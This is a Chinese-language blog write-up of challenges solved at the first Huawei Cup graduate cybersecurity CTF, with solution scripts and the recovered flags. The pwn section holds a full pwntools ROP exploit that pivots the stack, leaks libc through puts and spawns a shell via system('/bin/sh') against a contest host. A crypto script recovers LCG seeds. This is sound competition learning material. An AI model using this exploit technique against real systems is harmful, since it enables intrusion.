“华为杯”第一届中国研究生网络安全创新大赛

已于 2022-11-23 21:20:57 修改
阅读量1k 收藏 2
点赞数 2
文章标签: python 安全
于 2022-11-23 20:55:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44418623/article/details/128007486
版权

关于比赛

被拉去比赛(属于被迫营业了,好在没丢脸
前25晋级(鄙人所在战队24名 好险
赛制:两天 每天6小时 。有点折磨
录屏没啥好说了 近一年都这样
联网问题:官方wp用百度api???参赛选手不允许联网!!!
这一波 要么人工识别 要么自己训练模型。。。
非战队完整wp,仅为247533解出的题。

呜呜呜 我的公费旅游。。。。。。

misc_奇怪的E

在这里插入图片描述

0宽

在这里插入图片描述

压缩包密码 Cetacean

str = "EEEEEEEEEeeEEeeEEEEEEEEEEeeEeeEEEEEEEEEEEeeEEEEeEEEEEEEEEeeEEeeeEEEEEEEEEeeeeEeeEEEEEEEEEeEEEEeeEEEEEEEEEeeEEeEeEEEEEEEEEeeeEeEEEEEEEEEEEeeEEEEeEEEEEEEEEeeEEEeeEEEEEEEEEEeeEeEEEEEEEEEEEeeEEEEeEEEEEEEEEeeEeeeEEEEEEEEEEeEeeeeeEEEEEEEEEeEEEEeeEEEEEEEEEEeeEEEeEEEEEEEEEeeeEEEEEEEEEEEEEeeEeEEEEEEEEEEEEeeEEeEeEEEEEEEEEeeeEEeEEEEEEEEEEeEeeeeeEEEEEEEEEEeeEEEeEEEEEEEEEeeeEEeeEEEEEEEEEeEeeeeeEEEEEEEEEeeEEEEeEEEEEEEEEeEeeeeeEEEEEEEEEeeEEeeeEEEEEEEEEEeeEEEEEEEEEEEEEeeEeeeeEEEEEEEEEeeEEeEEEEEEEEEEEeEeeeeeEEEEEEEEEeeEEeEeEEEEEEEEEeEEeeeEEEEEEEEEEeeEEEeeEEEEEEEEEEeeEEEEEEEEEEEEEeeEEeEEEEEEEEEEEeeEEeEeEEEEEEEEEEeEEEEeEEEEEEEEEEeEEEEeEEEEEEEEEEeEEEEeEEEEEEEEEEeEEEEeEEEEEEEEEeeeeeEe"
bin = ''
for i in str:
    if i == 'E':
        bin+='0'
    else:
        bin+='1'

#二进制转字符串
def bin2str(bin):
    str = ''
    for i in range(0,len(bin),8):
        str+=chr(int(bin[i:i+8],2))
    return str

print(bin2str(bin))
#flag{Cetac4an_C1pher_1s_a_g0od_eNc0de!!!!}

pwn_stack

from pwn import *
context.arch="amd64"
#context.log_level="debug" 
#context.terminal = ['tmux', 'splitw', '-h'] 
elf=ELF("./stack")
#p=process("./stack")
p=remote("192.168.1.103",19999)
libc=ELF("./libc.so.6")
pop_rdi_ret=0x4007a3
pop_rsi_r15_ret=0x4007a1
leave_ret=0x400718
pop_rbp_ret=0x4005d0
name=0x6010a0

p.recvuntil("name:\n")


payload = p64(pop_rbp_ret) +p64(name+0x200)+p64(leave_ret)
payload = payload.ljust(0x208, b'a')
payload+=p64(pop_rdi_ret)+p64(elf.got["puts"])+p64(elf.plt["puts"])+p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_r15_ret)+p64(elf.bss(0x500))+p64(0)+p64(elf.plt["read"])
payload+=p64(pop_rbp_ret) +p64(elf.bss(0x500-8))+p64(leave_ret)
p.send(payload)

p.recvuntil(b"data:\n")
#gdb.attach(p,"b* 0x4006c8")
payload2=b"a"*112+p64(name-8)+p64(leave_ret)

p.send(payload2)
leak = p.recvuntil("\n", drop=True)
puts_addr=u64(leak.ljust(8, b'\x00'))

print(hex(puts_addr))
libc_base=puts_addr-libc.symbols["puts"]
system_addr=libc_base+libc.symbols["system"]
binsh=libc_base+next(libc.search(b"/bin/sh\x00"))

payload3=p64(pop_rdi_ret)+p64(binsh)+p64(pop_rsi_r15_ret)+p64(0)+p64(0)+p64(system_addr)
p.send(payload3)

p.interactive()

在这里插入图片描述

crypto_rand(seed)

from pwn import *
context.log_level = 'debug'
from gmpy2 import *
from primefac import *
from sympy import factorint
from functools import reduce
p=remote("192.168.1.105",19999)


def do1():
    p.recvuntil(b'a=')
    a = int(p.recvline(keepends=False))
    p.recvuntil(b'b=')
    b = int(p.recvline(keepends=False))
    p.recvuntil(b'N=')
    N = int(p.recvline(keepends=False))
    p.recvuntil(b'num1=')
    num1 = int(p.recvline(keepends=False))
    p.recvuntil(b'seed = ')
    seed = (num1-b)*invert(a,N)%N
    p.sendline(str(seed).encode())

def do2():
    p.recvuntil(b'a=')
    a = int(p.recvline(keepends=False))
    p.recvuntil(b'N=')
    N = int(p.recvline(keepends=False))
    p.recvuntil(b'num1=')
    num1 = int(p.recvline(keepends=False))
    p.recvuntil(b'num2=')
    num2 = int(p.recvline(keepends=False))
    p.recvuntil(b'seed = ')
    b = (num2-num1*a)%N
    seed = (num1-b)*invert(a,N)%N
    p.sendline(str(seed).encode())

def do3():
    p.recvuntil(b'N=')
    N = int(p.recvline(keepends=False))
    p.recvuntil(b'num1=')
    num1 = int(p.recvline(keepends=False))
    p.recvuntil(b'num2=')
    num2 = int(p.recvline(keepends=False))
    p.recvuntil(b'num3=')
    num3 = int(p.recvline(keepends=False))
    p.recvuntil(b'seed = ')
    a = (num3-num2)*invert(num2-num1,N)%N
    b = (num2-num1*a)%N
    seed = (num1-b)*invert(a,N)%N
    p.sendline(str(seed).encode())

def do4():
    
    p.recvuntil(b'num1=')
    num1 = int(p.recvline(keepends=False))
    p.recvuntil(b'num2=')
    num2 = int(p.recvline(keepends=False))
    p.recvuntil(b'num3=')
    num3 = int(p.recvline(keepends=False))
    p.recvuntil(b'num4=')
    num4 = int(p.recvline(keepends=False))
    p.recvuntil(b'num5=')
    num5 = int(p.recvline(keepends=False))
    p.recvuntil(b'num6=')
    num6 = int(p.recvline(keepends=False))
    s = [num1,num2,num3,num4,num5,num6]
    diffs = [s1 - s0 for s1, s0 in zip(s, s[1:])]
    zeros = [t2*t0-t1*t1 for t0, t1, t2 in zip(diffs, diffs[1:], diffs[2:])]
    N = abs(reduce(gcd, zeros))
    factors = factorint(N)
    while not isprime(N):
        for prime, order in factors.items():
            if prime.bit_length() > 128:
                continue
            N = N / prime**order
    a = (s[2] - s[1]) * invert(s[1] - s[0], N) % N
    b = (s[1] - s[0] * a) % N
    seed = (s[0] - b) * invert(a, N) % N
    p.sendline(str(seed).encode())

for i in range(50):
    print (i)
    do1()
for i in range(30):
    print (i)
    do2()
for i in range(20):
    print (i)
    do3()
do4()
p.recvall()
#f8d3c7fadc174d5d915ad2896e88d7a2

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-RQgrHTap-1669207382340)(C:\Users\lei20\AppData\Roaming\Typora\typora-user-images\image-20221112155242510.png)]

misc_Bit_QR

457c

在这里插入图片描述

1 里面的zlib里解压出

在这里插入图片描述

删除部分字节

在这里插入图片描述

de-415a5253db08}

另一张png

在这里插入图片描述

flag{fcc73648-a3dd-???-8b

最后合成

flag{fcc73648-a3dd-457c-8bde-415a5253db08}

247533
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
2019华为网络挑战大赛自测题-课后题(初赛)
Cassiel_Coder的博客.
04-13 8706
2019华为网络挑战大赛自测题自测-服务器操作系统基础原理自测-存储基础原理自测-云数据中心基础原理自测-数据库基础原理自测-网络基础原理自测-AI自测-网络安全自测-大数据基础概念自测-云计算基础概念自测-5G 自测-服务器操作系统基础原理 (单选题) (20分) Linux中的LVM逻辑卷能够根据需要扩展和收缩容量,下列原理描述正确的是哪一项? A.把存储资源颗粒化,根据需要组合出一定...
华为杯第一届中国研究生网络安全创新大赛-Bit_QR
Laffrey的专栏
11-14 540
第一届中国研究生网络安全创新大赛 Bit_QR wp
2023华为杯·第二届中国研究生网络安全创新大赛初赛 Writeup
monster663的博客
10-08 1112
wp是赛后复现写的,web环境当时没有做好截图这里是引用。
研究生创新联盟高校首届“卓朗杯”研究生网络与信息安全技术大赛河北省选拔赛部分WP
qq_35576225的博客
10-26 1593
题目一 签到题 点击F12进入开发者模式,重新访问网页,得到几个样式文件。 在样式文件index.js中搜索flag,发现 将这串代码复制到console控制台执行,得到最后的flag flag{CuB4_@nd_JSfuck} 题目二 re1 (用Exeinfo PE查看发现用upx.exe加壳了。 2.用 upx.exe -d 指令去壳 3.用ida pro转为伪汇编 分析代码发现flag就是”HappyNewYear!” ...
华为杯第一届中国研究生网络安全创新大赛全国三等奖项目视频及证书.zip
09-24
华为杯第一届中国研究生网络安全创新大赛全国三等奖项目视频及证书.zip
华为杯”第二届中国研究生网络安全创新大赛揭榜挑战赛赛题:富文本敏感信息泄露检测.zip
09-25
"华为杯"第二届中国研究生网络安全创新大赛聚焦于富文本敏感信息泄露检测这一主题,这是一项旨在提高网络安全防护意识和技术水平的竞赛。富文本通常包含了丰富的格式和内容,如HTML、Markdown等,它在互联网交流中...
2021年中国研究生数学建模竟赛赛题.zip
11-01
中国研究生数学建模竞赛是全国乃至全球华人研究生中极具影响力的一项科技活动,旨在培养研究生创新思维和团队合作精神,提升他们运用数学方法解决实际问题的能力。2021年的比赛,特别引入了华为杯,增加了竞赛的...
Ansys Zemax|场曲跟畸变图的前世今生
最新发布
ueotek的博客
07-02 263
这里的y和z坐标和方向余弦是(Hx, Hy, Px, Py)=(X, X, 0 ,0)和(Hx, Hy, Px, Py)=(X, X, 0 ,0.001),在光线追迹像面的前一个平面的 z坐标和方向余弦。OpticStudio通过在X和Y方向(弧矢和子午方向)的傍轴光线追踪确定近轴图像平面的Z坐标,并测量该近轴焦平面与系统图像平面的Z坐标之间的距离。使用附件中的样本文件,近轴像面的全局Z坐标与视场0处的像面位置之差与场曲和畸变图中的的Tan Shift相同。近轴像面的定义是以下两个光线交点的全局Z坐标。
力扣第214题“最短回文串”
10年数据\经营分析经验,现任大厂数据分析负责人
06-28 1171
本文详细解读了力扣第214题“最短回文串”,通过使用 KMP 算法的方法高效地解决了这一问题,并提供了详细的解释和模拟面试问答。希望读者通过本文的学习,能够在力扣刷题的过程中更加得心应手。
使用Python实现深度学习模型:序列建模与生成模型的博客教程
Echo_Wish的博客
07-02 427
本文介绍了使用Python实现深度学习模型的序列建模和生成模型的步骤。我们详细说明了每个步骤,并提供了相应的代码示例。通过学习本文,您将能够使用Python构建和训练序列建模和生成模型,并生成新的序列数据。希望本文对您有所帮助!如果您有任何问题或建议,请随时提出。
PyTorch读写模型(state_dict、torch.save、torch.load)
酒酿小圆子呀~
06-30 213
在PyTorch中,state_dict 是一个简单的python的字典对象,将每一层与它的对应参数建立映射关系。(如model的每一层的weights及bias等)注意:只有具有可学习参数的层(卷积层、线性层等)才有state_dict中的条目。优化器(optim)也有一个state_dict,其中包含关于优化器状态以及所使用的超参数的信息。
昇思25天学习打卡营第2天|张量学习
main_h_的博客
06-26 938
张量是一种特殊的数据结构,主要是描述矩阵 行列式这类。张量(Tensor)是MindSpore网络运算中的基本数据结构,类似日常的多维数组,不过比基础的数组多了一些描述信息。
llama.cpp
qq_38148600的博客
06-29 470
https://github.com/echonoshy/cgft-llm【大模型量化】- Llama.cpp轻量化模型部署及量化_哔哩哔哩_bilibiligithub.com/ggerganov/llama.cppcd ~/code/llama.cpp/build_cuda/bin ./quantize --allow-requantize /root/autodl-tmp/models/Llama3-8B-Chinese-Chat-GGUF/Llama3-8B-Chinese-Chat-q8_0-v2
解决Java中的数组越界异常的技术
weixin_44627014的博客
06-26 842
通过本文的讨论,我们了解了如何有效地处理Java中的数组越界异常。预防异常的发生,合理使用异常处理机制以及考虑使用集合类来替代数组,是确保Java应用程序稳定性和可靠性的关键步骤。
Java的异常处理体系
落日的博客
06-28 1196
ControllerAdvice 注解用于定义全局控制器建议,在 Spring MVC 中,控制器建议由控制器中的 @ExceptionHandler 方法、@InitBinder 方法和 @ModelAttribute 方法组成。①、CheckedException (检查异常 必须在代码中显式处理 使用try catch捕获 或者 在方法上使用 throws 抛出 除了RuntimeException及其子类以外,其他的Exception类及其子类都属于受检查异常 )
Scrapy框架与其他Python爬虫库的对比分析
wx_19970108018的博客
06-28 643
如果需要爬取大量网站的数据,并且需要复杂的处理操作,那么 Scrapy 框架是比较不错的选择;对于初学者来说,建议先学习其他 Python 爬虫库,掌握爬虫的基本技术,再考虑使用 Scrapy 框架进行深入的学习和开发。Scrapy 是一个专门为爬取网站数据而设计的框架,它内置了许多常用的爬虫功能,如自动模拟 HTTP 请求、页面解析、数据提取、数据存储等。BeautifulSoup 是 Python 中非常流行的 HTML 解析库,它可以快速、灵活地解析 HTML 页面,并提取需要的数据。
lambda_函数式编程_stream流
qq_30166465的博客
06-27 102
【代码】stream流使用案例。
Python布尔值:理解与应用
RetutghbxLouis的博客
06-26 400
Python中的布尔值是逻辑数据类型,用于表示真(True)或假(False)两种状态。布尔值在编程中广泛用于条件判断和逻辑运算,是程序中控制流程和逻辑判断的基础。Python的布尔值支持逻辑运算符(如and、or、not)以及与比较运算符(如==、!=、<、>等)的结合使用,使得开发者可以根据条件执行不同的代码分支,实现复杂的逻辑控制。
编译正则表达式模式re.compile
liujingwei8610的专栏
06-27 338
print("【执行】pattern.findall('这里有123个苹果和45个橘子')")result = pattern.findall('这里有123个苹果和45个橘子')print(f"【显示】pattern={pattern}")print(f"【显示】result={result}")根据给定的Python代码,哪个选项是正确的?A选项:返回值可以进行search操作。B选项:返回值可以进行match操作。D选项:参数为要编译的正则表达式模式。C选项:参数为要搜索的字符串。
第十一届华为杯全国研究生数学建模竞赛题目d
09-05
第十一届华为杯全国研究生数学建模竞赛题目D是一个关于水资源优化分配的问题。在这个问题中,我们需要考虑如何合理分配水资源以满足不同地区的需求。 首先,我们需要了解不同地区的水资源情况和需求量。通过收集...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值